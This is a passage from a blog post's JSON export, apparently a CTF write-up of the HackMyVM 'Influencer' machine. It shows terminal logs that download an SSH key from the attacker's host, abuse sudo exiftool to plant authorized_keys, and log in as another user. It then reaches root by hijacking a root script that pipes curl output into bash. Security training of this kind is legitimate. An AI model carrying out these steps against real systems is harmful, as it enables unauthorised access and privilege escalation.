200 OK\nLength: 2590 (2,5K) [application\/octet-stream]\nSaving to: \u2018juan\u2019\n\njuan                                  100%[=========================================================================&gt;]   2,53K  --.-KB\/s    in 0s      \n\n2024-04-28 12:22:19 (276 MB\/s) - \u2018juan\u2019 saved [2590\/2590]\n\nluna@influencer:\/tmp$ wget http:\/\/192.168.0.143:8888\/juan.pub\n--2024-04-28 12:22:23--  http:\/\/192.168.0.143:8888\/juan.pub\nConnecting to 192.168.0.143:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 563 [application\/vnd.exstream-package]\nSaving to: \u2018juan.pub\u2019\n\njuan.pub                              100%[=========================================================================&gt;]     563  --.-KB\/s    in 0s      \n\n2024-04-28 12:22:23 (107 MB\/s) - \u2018juan.pub\u2019 saved [563\/563]\n\nluna@influencer:\/tmp$ mv juan.pub authorized_keys\nluna@influencer:\/tmp$ sudo -u juan exiftool -filename=\/home\/juan\/.ssh\/authorized_keys authorized_keys \nWarning: Error removing old file - authorized_keys\n    1 directories created\n    1 image files updated\nluna@influencer:\/tmp$ sudo -u juan exiftool -filename=\/home\/juan\/.ssh\/authorized_keys authorized_keys \nError: &#039;\/home\/juan\/.ssh\/authorized_keys&#039; already exists - authorized_keys\n    0 image files updated\n    1 files weren&#039;t updated due to errors\nluna@influencer:\/tmp$ chmod 600 juan\nluna@influencer:\/tmp$ ssh juan@0.0.0.0 -p 1212 -i juan\nThe authenticity of host &#039;[0.0.0.0]:1212 ([0.0.0.0]:1212)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:uujkDI7HQ0Bk3td\/3NfWys9FNY5cbT1zvGvXbluerAk.\nThis key is not known by any other names\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? 
yes\nWarning: Permanently added &#039;[0.0.0.0]:1212&#039; (ED25519) to the list of known hosts.\nWelcome to Ubuntu 22.04.2 LTS (GNU\/Linux 5.15.0-73-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n  System information as of dom 28 abr 2024 12:25:44 UTC\n\n  System load:  0.0                Processes:               128\n  Usage of \/:   55.9% of 11.21GB   Users logged in:         1\n  Memory usage: 45%                IPv4 address for enp0s3: 192.168.0.139\n  Swap usage:   0%\n\n * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s\n   just raised the bar for easy, resilient and secure K8s cluster deployment.\n\n   https:\/\/ubuntu.com\/engage\/secure-kubernetes-at-the-edge\n\nEl mantenimiento de seguridad expandido para Applications est\u00e1 desactivado\n\nSe pueden aplicar 0 actualizaciones de forma inmediata.\n\nActive ESM Apps para recibir futuras actualizaciones de seguridad adicionales.\nVea https:\/\/ubuntu.com\/esm o ejecute \u00absudo pro status\u00bb\n\nThe list of available updates is more than a week old.\nTo check for new updates run: sudo apt update\n\nThe programs included with the Ubuntu system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nUbuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by\napplicable law.\n\njuan@influencer:~$ <\/code><\/pre>\n<h3>Escalating to root<\/h3>\n<p>The first step is, again, information gathering:<\/p>\n<pre><code class=\"language-bash\">juan@influencer:~$ sudo -l\nMatching Defaults entries for juan on influencer:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser juan may run the following commands on influencer:\n    (root) NOPASSWD: \/bin\/bash 
\/home\/juan\/check.sh\njuan@influencer:~$ cat \/home\/juan\/check.sh\n#!\/bin\/bash\n\n\/usr\/bin\/curl http:\/\/server.hmv\/98127651 | \/bin\/bash<\/code><\/pre>\n<p>ARP spoofing again:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037353.png\" alt=\"image-20240428203227656\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037354.png\" alt=\"image-20240428203243419\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037355.png\" alt=\"image-20240428203257401\" style=\"zoom:50%;\" \/><\/p>\n<p>It turns out to be writable, and it already carries its own resolution entry, no wonder it was not working... But having come this far, deleting that built-in entry should do it:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037356.png\" alt=\"image-20240428203609447\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037357.png\" alt=\"image-20240428203619852\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404282037358.png\" alt=\"image-20240428203632120\" style=\"zoom:50%;\" \/><\/p>\n<p>Got the root shell!!!!!<\/p>\n<h2>References<\/h2>\n<p><a href=\"https:\/\/www.bilibili.com\/video\/BV1AC411j7Zj\/\">https:\/\/www.bilibili.com\/video\/BV1AC411j7Zj\/<\/a><\/p>\n<p><a href=\"https:\/\/0xh3rshel.github.io\/hmv-influencer\/\">https:\/\/0xh3rshel.github.io\/hmv-influencer\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Influencer Information gathering Port scanning \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Influencer] 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-655","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/655","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=655"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/655\/revisions"}],"predecessor-version":[{"id":656,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/655\/revisions\/656"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=655"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=655"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=655"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}